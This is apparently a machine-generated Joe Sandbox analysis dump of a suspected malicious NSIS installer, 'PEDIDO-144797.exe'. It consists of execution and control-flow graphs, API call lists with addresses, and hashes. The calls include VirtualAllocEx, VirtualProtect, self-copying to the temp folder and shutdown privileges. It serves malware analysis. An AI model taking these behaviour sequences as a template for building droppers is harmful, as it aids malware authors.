calls 5490->5491 5492 401e8f 5491->5492 5493 402c37 17 API calls 5492->5493 5494 401e98 5493->5494 5495 401423 24 API calls 5494->5495 5496 401e9f 5495->5496 5503 4059d8 ShellExecuteExW 5496->5503 5498 401ee1 5499 40683b 5 API calls 5498->5499 5501 402885 5498->5501 5500 401efb CloseHandle 5499->5500 5500->5501 5503->5498 5504 406e77 5508 40693e 5504->5508 5505 4072a9 5506 4069c8 GlobalAlloc 5506->5505 5506->5508 5507 4069bf GlobalFree 5507->5506 5508->5505 5508->5506 5508->5507 5508->5508 5509 406a36 GlobalFree 5508->5509 5510 406a3f GlobalAlloc 5508->5510 5509->5510 5510->5505 5510->5508 5511 10002238 5512 10002296 5511->5512 5513 100022cc 5511->5513 5512->5513 5514 100022a8 GlobalAlloc 5512->5514 5514->5512 5515 40167b 5516 402c37 17 API calls 5515->5516 5517 401682 5516->5517 5518 402c37 17 API calls 5517->5518 5519 40168b 5518->5519 5520 402c37 17 API calls 5519->5520 5521 
401694 MoveFileW 5520->5521 5522 4016a7 5521->5522 5528 4016a0 5521->5528 5523 40224a 5522->5523 5524 4066f3 2 API calls 5522->5524 5526 4016b6 5524->5526 5525 401423 24 API calls 5525->5523 5526->5523 5527 406176 36 API calls 5526->5527 5527->5528 5528->5525 5529 403a7c 5530 403a87 5529->5530 5531 403a8b 5530->5531 5532 403a8e GlobalAlloc 5530->5532 5532->5531 5533 1000103d 5534 1000101b 5 API calls 5533->5534 5535 10001056 5534->5535 5049 40247e 5050 402c77 17 API calls 5049->5050 5051 402488 5050->5051 5052 402c37 17 API calls 5051->5052 5053 402491 5052->5053 5054 40249c RegQueryValueExW 5053->5054 5058 402885 5053->5058 5055 4024c2 RegCloseKey 5054->5055 5056 4024bc 5054->5056 5055->5058 5056->5055 5060 4062f7 wsprintfW 5056->5060 5060->5055 5536 4020fe 5537 402c37 17 API calls 5536->5537 5538 402105 5537->5538 5539 402c37 17 API calls 5538->5539 5540 40210f 5539->5540 5541 402c37 17 API calls 5540->5541 5542 402119 5541->5542 5543 402c37 17 API calls 5542->5543 5544 402123 5543->5544 5545 402c37 17 API calls 5544->5545 5546 40212d 5545->5546 5547 40216c CoCreateInstance 5546->5547 5548 402c37 17 API calls 5546->5548 5551 40218b 5547->5551 5548->5547 5549 401423 24 API calls 5550 40224a 5549->5550 5551->5549 5551->5550 5552 4019ff 5553 402c37 17 API calls 5552->5553 5554 401a06 5553->5554 5555 402c37 17 API calls 5554->5555 5556 401a0f 5555->5556 5557 401a16 lstrcmpiW 5556->5557 5558 401a28 lstrcmpW 5556->5558 5559 401a1c 5557->5559 5558->5559 4111 401f00 4126 402c37 4111->4126 4120 401f2b 4122 401f30 4120->4122 4123 401f3b 4120->4123 4121 402885 4151 4062f7 wsprintfW 4122->4151 4125 401f39 CloseHandle 4123->4125 4125->4121 4127 402c43 4126->4127 4152 4063d2 4127->4152 4130 401f06 4132 405414 4130->4132 4133 40542f 4132->4133 4141 401f10 4132->4141 4134 40544b lstrlenW 4133->4134 4135 4063d2 17 API calls 4133->4135 4136 405474 4134->4136 4137 405459 lstrlenW 4134->4137 4135->4134 4139 405487 4136->4139 4140 40547a SetWindowTextW 4136->4140 4138 40546b lstrcatW 
4137->4138 4137->4141 4138->4136 4139->4141 4142 40548d SendMessageW SendMessageW SendMessageW 4139->4142 4140->4139 4143 405995 CreateProcessW 4141->4143 4142->4141 4144 401f16 4143->4144 4145 4059c8 CloseHandle 4143->4145 4144->4121 4144->4125 4146 40683b WaitForSingleObject 4144->4146 4145->4144 4147 406855 4146->4147 4148 406867 GetExitCodeProcess 4147->4148 4194 4067c6 4147->4194 4148->4120 4151->4125 4153 4063df 4152->4153 4154 40662a 4153->4154 4157 4065f8 lstrlenW 4153->4157 4158 4063d2 10 API calls 4153->4158 4161 40650d GetSystemDirectoryW 4153->4161 4163 406520 GetWindowsDirectoryW 4153->4163 4164 406644 5 API calls 4153->4164 4165 4063d2 10 API calls 4153->4165 4166 40659b lstrcatW 4153->4166 4167 406554 SHGetSpecialFolderLocation 4153->4167 4178 40627e 4153->4178 4183 4062f7 wsprintfW 4153->4183 4184 4063b0 lstrcpynW 4153->4184 4155 402c64 4154->4155 4185 4063b0 lstrcpynW 4154->4185 4155->4130 4169 406644 4155->4169 4157->4153 4158->4157 4161->4153 4163->4153 4164->4153 4165->4153 4166->4153 4167->4153 4168 40656c SHGetPathFromIDListW CoTaskMemFree 4167->4168 4168->4153 4175 406651 4169->4175 4170 4066c7 4171 4066cc CharPrevW 4170->4171 4173 4066ed 4170->4173 4171->4170 4172 4066ba CharNextW 4172->4170 4172->4175 4173->4130 4175->4170 4175->4172 4176 4066a6 CharNextW 4175->4176 4177 4066b5 CharNextW 4175->4177 4190 405cae 4175->4190 4176->4175 4177->4172 4186 40621d 4178->4186 4181 4062b2 RegQueryValueExW RegCloseKey 4182 4062e2 4181->4182 4182->4153 4183->4153 4184->4153 4185->4155 4187 40622c 4186->4187 4188 406230 4187->4188 4189 406235 RegOpenKeyExW 4187->4189 4188->4181 4188->4182 4189->4188 4191 405cb4 4190->4191 4192 405cca 4191->4192 4193 405cbb CharNextW 4191->4193 4192->4175 4193->4191 4195 4067e3 PeekMessageW 4194->4195 4196 4067f3 WaitForSingleObject 4195->4196 4197 4067d9 DispatchMessageW 4195->4197 4196->4147 4197->4195 5560 401000 5561 401037 BeginPaint GetClientRect 5560->5561 5562 40100c DefWindowProcW 5560->5562 5564 4010f3 5561->5564 
5565 401179 5562->5565 5566 401073 CreateBrushIndirect FillRect DeleteObject 5564->5566 5567 4010fc 5564->5567 5566->5564 5568 401102 CreateFontIndirectW 5567->5568 5569 401167 EndPaint 5567->5569 5568->5569 5570 401112 6 API calls 5568->5570 5569->5565 5570->5569 4372 100027c2 4373 10002812 4372->4373 4374 100027d2 VirtualProtect 4372->4374 4374->4373 5571 401503 5572 40150b 5571->5572 5574 40151e 5571->5574 5573 402c15 17 API calls 5572->5573 5573->5574 4414 402306 4415 40230e 4414->4415 4418 402314 4414->4418 4416 402c37 17 API calls 4415->4416 4416->4418 4417 402322 4420 402c37 17 API calls 4417->4420 4422 402330 4417->4422 4418->4417 4419 402c37 17 API calls 4418->4419 4419->4417 4420->4422 4421 402c37 17 API calls 4423 402339 WritePrivateProfileStringW 4421->4423 4422->4421 5582 401f86 5583 402c37 17 API calls 5582->5583 5584 401f8d 5583->5584 5585 40678a 5 API calls 5584->5585 5586 401f9c 5585->5586 5587 401fb8 GlobalAlloc 5586->5587 5588 402020 5586->5588 5587->5588 5589 401fcc 5587->5589 5590 40678a 5 API calls 5589->5590 5591 401fd3 5590->5591 5592 40678a 5 API calls 5591->5592 5593 401fdd 5592->5593 5593->5588 5597 4062f7 wsprintfW 5593->5597 5595 402012 5598 4062f7 wsprintfW 5595->5598 5597->5595 5598->5588 4424 402388 4425 402390 4424->4425 4426 4023bb 4424->4426 4440 402c77 4425->4440 4428 402c37 17 API calls 4426->4428 4430 4023c2 4428->4430 4436 402cf5 4430->4436 4431 4023a1 4433 402c37 17 API calls 4431->4433 4435 4023a8 RegDeleteValueW RegCloseKey 4433->4435 4434 4023cf 4435->4434 4437 402d0b 4436->4437 4438 402d21 4437->4438 4445 402d2a 4437->4445 4438->4434 4441 402c37 17 API calls 4440->4441 4442 402c8e 4441->4442 4443 40621d RegOpenKeyExW 4442->4443 4444 402397 4443->4444 4444->4431 4444->4434 4446 40621d RegOpenKeyExW 4445->4446 4447 402d58 4446->4447 4448 402dd0 4447->4448 4453 402d5c 4447->4453 4448->4438 4449 402d7e RegEnumKeyW 4450 402d95 RegCloseKey 4449->4450 4449->4453 4451 40678a 5 API calls 4450->4451 4454 402da5 4451->4454 4452 
[Execution-graph edge list omitted: the viewer's node/edge dump (node id, address, API names and id->id edges) for the whole sample. Roots visible in the dump include the NSIS installer entry at 0x403489 and plugin-DLL routines at 0x10001759 and 0x1000289c; the latter reaches VirtualAllocEx at 0x10002953 followed by GetLastError at 0x10002a62, and the 0x10002110 path resolves imports with GetModuleHandleW, LoadLibraryW and GetProcAddress.]
Control-flow Graph

• Executed
• Not Executed

[Control-flow-graph block list for the function at 0x403489 omitted: the viewer's basic-block dump with executed/not-executed colouring. The recoverable path runs SetErrorMode/GetVersion -> lstrlenA(UXTHEME) -> #17/OleInitialize/SHGetFileInfoW -> GetCommandLineW/GetModuleHandleW -> GetTempPathW/GetWindowsDirectoryW with the TEMP/TMP environment rewrite -> DeleteFileW -> the ~nsu*.tmp copy (lstrcatW, lstrcmpiW, SetCurrentDirectoryW, CopyFileW) -> OleUninitialize, with a GetCurrentProcess/OpenProcessToken/LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx branch before ExitProcess.]
APIs
• SetErrorMode.KERNELBASE ref: 004034AC
• GetVersion.KERNEL32 ref: 004034B2
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
• OleInitialize.OLE32(00000000), ref: 00403529
• SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
• GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
  • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
  • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
• DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
  • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
• OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
• ExitProcess.KERNEL32 ref: 00403820
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                                                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\PEDIDO-144797.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                                                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                                                                                          • ExitProcess.KERNEL32 ref: 004039C6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144797.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                          • API String ID: 2488574733-2676631552
                                                                                                                                          • Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                          • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                                                                                          • Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                          • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 484 405abe-405ae4 call 405d89 487 405ae6-405af8 DeleteFileW 484->487 488 405afd-405b04 484->488 489 405c7a-405c7e 487->489 490 405b06-405b08 488->490 491 405b17-405b27 call 4063b0 488->491 493 405c28-405c2d 490->493 494 405b0e-405b11 490->494 497 405b36-405b37 call 405ccd 491->497 498 405b29-405b34 lstrcatW 491->498 493->489 496 405c2f-405c32 493->496 494->491 494->493 499 405c34-405c3a 496->499 500 405c3c-405c44 call 4066f3 496->500 501 405b3c-405b40 497->501 498->501 499->489 500->489 508 405c46-405c5a call 405c81 call 405a76 500->508 504 405b42-405b4a 501->504 505 405b4c-405b52 lstrcatW 501->505 504->505 507 405b57-405b73 lstrlenW FindFirstFileW 504->507 505->507 509 405b79-405b81 507->509 510 405c1d-405c21 507->510 526 405c72-405c75 call 405414 508->526 527 405c5c-405c5f 508->527 513 405ba1-405bb5 call 4063b0 509->513 514 405b83-405b8b 509->514 510->493 512 405c23 510->512 512->493 524 405bb7-405bbf 513->524 525 405bcc-405bd7 call 405a76 513->525 516 405c00-405c10 FindNextFileW 514->516 517 405b8d-405b95 514->517 516->509 520 405c16-405c17 FindClose 516->520 517->513 521 405b97-405b9f 517->521 520->510 521->513 521->516 524->516 529 405bc1-405bca call 405abe 524->529 537 405bf8-405bfb call 405414 525->537 538 405bd9-405bdc 525->538 526->489 527->499 528 405c61-405c70 call 405414 call 406176 527->528 528->489 529->516 537->516 540 405bf0-405bf6 538->540 541 405bde-405bee call 405414 call 406176 538->541 540->516 541->516
                                                                                                                                          APIs
                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405AE7
                                                                                                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B2F
                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B52
                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B58
                                                                                                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405B68
                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                          • API String ID: 2035342205-897507723
                                                                                                                                          • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                          • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                                                                                          • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                          • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 842 406aba-406abf 843 406b30-406b4e 842->843 844 406ac1-406af0 842->844 845 407126-40713b 843->845 846 406af2-406af5 844->846 847 406af7-406afb 844->847 848 407155-40716b 845->848 849 40713d-407153 845->849 850 406b07-406b0a 846->850 851 406b03 847->851 852 406afd-406b01 847->852 855 40716e-407175 848->855 849->855 853 406b28-406b2b 850->853 854 406b0c-406b15 850->854 851->850 852->850 858 406cfd-406d1b 853->858 856 406b17 854->856 857 406b1a-406b26 854->857 859 407177-40717b 855->859 860 40719c-4071a8 855->860 856->857 862 406b90-406bbe 857->862 865 406d33-406d45 858->865 866 406d1d-406d31 858->866 863 407181-407199 859->863 864 40732a-407334 859->864 869 40693e-406947 860->869 870 406bc0-406bd8 862->870 871 406bda-406bf4 862->871 863->860 867 407340-407353 864->867 868 406d48-406d52 865->868 866->868 877 407358-40735c 867->877 872 406d54 868->872 873 406cf5-406cfb 868->873 874 407355 869->874 875 40694d 869->875 876 406bf7-406c01 870->876 871->876 878 406cd0-406cd4 872->878 879 406e65-406e72 872->879 873->858 880 406c99-406ca3 873->880 874->877 881 406954-406958 875->881 882 406a94-406ab5 875->882 883 4069f9-4069fd 875->883 884 406a69-406a6d 875->884 885 406c07 876->885 886 406b78-406b7e 876->886 897 406cda-406cf2 878->897 898 4072dc-4072e6 878->898 879->869 890 406ec1-406ed0 879->890 893 4072e8-4072f2 880->893 894 406ca9-406ccb 880->894 881->867 899 40695e-40696b 881->899 882->845 891 406a03-406a1c 883->891 892 4072a9-4072b3 883->892 888 406a73-406a87 884->888 889 4072b8-4072c2 884->889 901 4072c4-4072ce 885->901 902 406b5d-406b75 885->902 895 406c31-406c37 886->895 896 406b84-406b8a 886->896 900 406a8a-406a92 888->900 889->867 890->845 906 406a1f-406a23 891->906 892->867 893->867 894->879 903 406c95 895->903 905 406c39-406c57 895->905 896->862 896->903 897->873 898->867 899->874 904 406971-4069b7 899->904 
900->882 900->884 901->867 902->886 903->880 907 4069b9-4069bd 904->907 908 4069df-4069e1 904->908 909 406c59-406c6d 905->909 910 406c6f-406c81 905->910 906->883 911 406a25-406a2b 906->911 912 4069c8-4069d6 GlobalAlloc 907->912 913 4069bf-4069c2 GlobalFree 907->913 915 4069e3-4069ed 908->915 916 4069ef-4069f7 908->916 914 406c84-406c8e 909->914 910->914 917 406a55-406a67 911->917 918 406a2d-406a34 911->918 912->874 919 4069dc 912->919 913->912 914->895 920 406c90 914->920 915->915 915->916 916->906 917->900 921 406a36-406a39 GlobalFree 918->921 922 406a3f-406a4f GlobalAlloc 918->922 919->908 924 4072d0-4072da 920->924 925 406c16-406c2e 920->925 921->922 922->874 922->917 924->867 925->895
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
• Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
• Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
• Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
APIs
• FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0), ref: 004066FE
• FindClose.KERNELBASE(00000000), ref: 0040670A
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: xgB
• API String ID: 2295610775-399326502
• Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
• Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
• Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
• Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8

Control-flow Graph
